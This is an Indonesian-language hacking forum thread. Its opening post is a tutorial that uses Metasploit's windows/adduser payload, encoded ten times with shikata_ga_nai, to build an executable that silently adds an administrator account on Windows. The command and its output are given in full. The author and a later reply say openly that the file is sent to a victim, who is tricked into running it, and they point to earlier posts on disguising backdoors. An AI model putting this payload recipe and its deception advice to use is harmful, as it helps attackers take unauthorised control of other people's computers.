add user administrator windows dengan metasploit
#1
ok kembali lagi bersama saya , zee eichel yang lumayan ganteng ..hahaha. Moga-moga teman-teman tidaklah bosan mengunjungi blog saya yang cupu ini. Tongue . Untuk kesempatan share kali ini, saya akan berbagi masalah metasploit. Kali ini kita akan membuat program exe, yang nantinya akan membuat user administrator pada windows. Gimana, lumyan keren kan,.. hehehe. Ane membuat backdoor ini menggunakan backtrack 5 versi gnome.. ya bagi teman2 yang memakai metasploit pada windows bisa juga kok ..

ya udah langsung aja yak…

Pertama-tama kita buka directory dimana framework3 berada ..

root@zee-IBTeam:/pentest/exploits/framework2# cd /pentest/exploits/framework3

Nah kalo sudah teman-teman tinggal memasukan perintah ini..

root@zee-IBTeam:/pentest/exploits/framework3# ./msfpayload windows/adduser pass=coba user=ibt r | ./msfencode -t exe -e x86/shikata_ga_nai -c 10 -o addinguser.exe


ket :
pass=”password account buatan anda” (tanpa tanda kutip dan spasi )
user=”Nama user administrator buatan anda” ( tanpa tanda kutip dan spasi )
addinguser.exe = nama file exenya ( bisa di ganti sesuai kehendak anda )


nah enter deh…

root@zee-IBTeam:/pentest/exploits/framework3# ./msfpayload windows/adduser pass=coba user=ibt r | ./msfencode -t exe -e x86/shikata_ga_nai -c 10 -o addinguser.exe
[*] x86/shikata_ga_nai succeeded with size 294 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 321 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 348 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 375 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 402 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 429 (iteration=6)

[*] x86/shikata_ga_nai succeeded with size 456 (iteration=7)

[*] x86/shikata_ga_nai succeeded with size 483 (iteration=8)

[*] x86/shikata_ga_nai succeeded with size 510 (iteration=9)

[*] x86/shikata_ga_nai succeeded with size 537 (iteration=10)


Nah pada kasus ini korban harus mengesekusi file.exe tersebut.. ya tinggal dituntut kreativitas teman-teman bagaimana sampai hal itu dapat terjadi. Banyak trik yang sudah saya paparkan untuk membuat penyamaran backdoor serta tipu muslihat exe untuk windows.. makanya sering2 lah membaca artikel2 saya sebelumnya .. hehehe

Penampakan pada windows ..

[Image: 2n8yob9.jpg?w=497&h=369]

w0w kk w0w .. sudah terbentuk user adminstrator buatan .. klo windows tersebut membuka layanan remote.. wah gk tau ane dah jadi apa .. ahhahaha

[Image: 21oomxl.jpg?w=497&h=363]

moga berguna buat teman2 sekalian :apn::apn:
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#2
itu gambar cewenya itu lho om zee =))

=))

#3
Mantep kak infonya,pa lgi gambar nya ,=))

#4
waduh, metasploit itu ternyata menarik ya...
dan sepertinya mudah *preeett

pengen belajar2 metasploit jadinya.....
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#5
kl cara diatas hrs dah ada backdoor'a kan omz....?

#6
(06-19-2011, 10:41 PM)micko Wrote: kl cara diatas hrs dah ada backdoor'a kan omz....?

cara di atas adalah cara membuat backdoor exe dengan metasploit .. nah nantinya kita kirim ke target.. biarkan target mengesekusinya Tongue .. klo tehnik penyamaran bisa make tehnik yang udah ane share sebelumnya .... supaya si client bisa terkelabui Tongue

http://id-backtrack.com/?p=223
:pc:
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#7
cara ngeditnya di windows gimana caranya mas bro
yoi sukses pembuatanya btw cara pemakaianyya gimana mr zee.. masi pengguna baru ni

#8
wew...

ijin tes ya kaka...

#9
(07-02-2011, 11:57 PM)R-12 Wrote: cara ngeditnya di windows gimana caranya mas bro
yoi sukses pembuatanya btw cara pemakaianyya gimana mr zee.. masi pengguna baru ni

sukses kan ? terus bingungnya di mana bro ?

(07-03-2011, 05:26 PM)Veronochi Wrote: wew...

ijin tes ya kaka...

iya silahkan kk ...

FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#10
om...zee ditunggu tutor exploit buat wedus 7 nya. XP mulai jarang yg pakai nih.






Users browsing this thread: 1 Guest(s)